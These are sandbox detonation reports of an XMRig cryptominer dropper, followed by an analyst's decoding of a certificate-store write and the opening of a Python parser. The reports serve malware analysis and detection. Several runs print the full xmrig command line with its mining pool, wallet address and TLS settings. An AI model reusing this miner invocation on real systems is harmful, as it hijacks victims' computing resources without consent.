memory/2108-41-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-42-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-43-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-44-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-45-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-46-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-47-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-48-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-49-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-50-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-51-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-52-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-53-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-54-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-55-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-56-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-57-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-58-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-59-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-60-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-61-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-62-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-63-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-64-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-65-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-66-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-67-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-68-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-69-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-70-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-71-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-72-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-73-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-74-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-75-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-76-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-77-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-78-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-79-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-80-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-81-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-82-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-83-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-84-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2908 wrote to memory of 4508 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2908 wrote to memory of 4508 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4508-16-0x0000026BBDD30000-0x0000026BBDD50000-memory.dmp
memory/4508-17-0x0000026BBF530000-0x0000026BBF550000-memory.dmp
memory/4508-18-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-19-0x0000026BBF550000-0x0000026BBF570000-memory.dmp
memory/4508-20-0x0000026C51F30000-0x0000026C51F50000-memory.dmp
memory/4508-21-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-22-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-24-0x0000026BBF550000-0x0000026BBF570000-memory.dmp
memory/4508-23-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-25-0x0000026C51F30000-0x0000026C51F50000-memory.dmp
memory/4508-26-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-27-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-28-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-29-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-30-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-31-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-32-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-33-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-34-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-35-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-36-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-37-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-38-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-39-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-40-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-41-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-42-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-43-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-44-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-45-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-46-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-47-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-48-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-49-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-50-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-51-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-52-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-53-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-54-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-55-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-56-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-57-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-58-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-59-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-60-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-61-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-62-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-63-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-64-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-65-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-66-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-67-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-68-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-69-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-70-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-71-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-72-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-73-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-74-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-75-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-76-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-77-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-78-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-79-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-80-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-81-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-82-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-83-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
memory/4508-84-0x00007FF6D6660000-0x00007FF6D7163000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:16
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2980 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2980 wrote to memory of 2576 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2576-16-0x0000024D31910000-0x0000024D31930000-memory.dmp
memory/2576-17-0x0000024D33420000-0x0000024D33440000-memory.dmp
memory/2576-18-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-19-0x0000024D33440000-0x0000024D33460000-memory.dmp
memory/2576-20-0x0000024D33460000-0x0000024D33480000-memory.dmp
memory/2576-21-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-22-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-25-0x0000024D33460000-0x0000024D33480000-memory.dmp
memory/2576-24-0x0000024D33440000-0x0000024D33460000-memory.dmp
memory/2576-23-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-26-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-27-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-28-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-29-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-30-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-31-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-32-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-33-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-34-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-35-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-36-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-37-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-38-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-39-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-40-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-41-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-42-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-43-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-44-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-45-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-46-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-47-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-48-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-49-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-50-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-51-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-52-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-53-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-54-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-55-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-56-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-57-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-58-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-59-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-60-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-61-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-62-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-63-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-64-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-65-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-66-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-67-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-68-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-69-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-70-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-71-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-72-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-73-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-74-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-75-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-76-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-77-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-78-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-79-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-80-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-81-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-82-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-83-0x00007FF672A60000-0x00007FF673563000-memory.dmp
memory/2576-84-0x00007FF672A60000-0x00007FF673563000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:28
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
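The AuthRoot write above deserves decoding before it is counted as trust-store tampering. The Python below is an added example; it is not part of the sandbox report and not code from the sample. It parses the Blob value from the row above (the serialized CERT_* property-record layout that crypt32 writes under SystemCertificates\...\Blob: DWORD property ID, DWORD reserved, DWORD length, data), recovers the DER certificate the blob carries, and checks that the SHA-1 of that certificate equals the thumbprint in the registry key name and that the stored SHA-256 and key-identifier properties agree with it. What comes out is the Comodo CA Limited "AAA Certificate Services" root, stored with the friendly name "Sectigo (AAA)" and with CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID and CERT_AUTH_ROOT_SHA256_HASH_PROP_ID set. Those two properties, and the AuthRoot location, are consistent with Windows' automatic root update caching a root that a TLS chain in this run needed, rather than with the sample adding a root of its own; which connection triggered it cannot be read from the Network table, though the download from objects.githubusercontent.com over 443 that precedes the drop of xmrig.exe is the likeliest. The check below does not depend on that guess: it verifies the hashes instead of trusting the key name. The property-ID names come from wincrypt.h; the DER walker is minimal and assumes a well-formed certificate.

```python
import hashlib
import struct

# Registry key name from the 'Modifies system certificate store' rows (SHA-1 thumbprint).
KEY_THUMBPRINT = "D1EB23A46D17D68FD92564C2F1F1601764D8E349"
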